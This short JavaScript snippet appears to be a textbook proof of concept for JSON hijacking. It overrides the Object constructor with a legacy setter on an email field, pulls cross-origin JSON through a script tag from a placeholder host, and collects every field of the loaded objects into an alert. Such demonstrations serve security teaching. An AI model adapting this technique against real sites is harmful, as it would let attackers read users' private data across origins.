function Object() {
this.email setter = captureObject;
}
<script src="http://www.example.com/object.json"></script>
function captureObject(x) {
var objString = "";
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
alert(objString);
}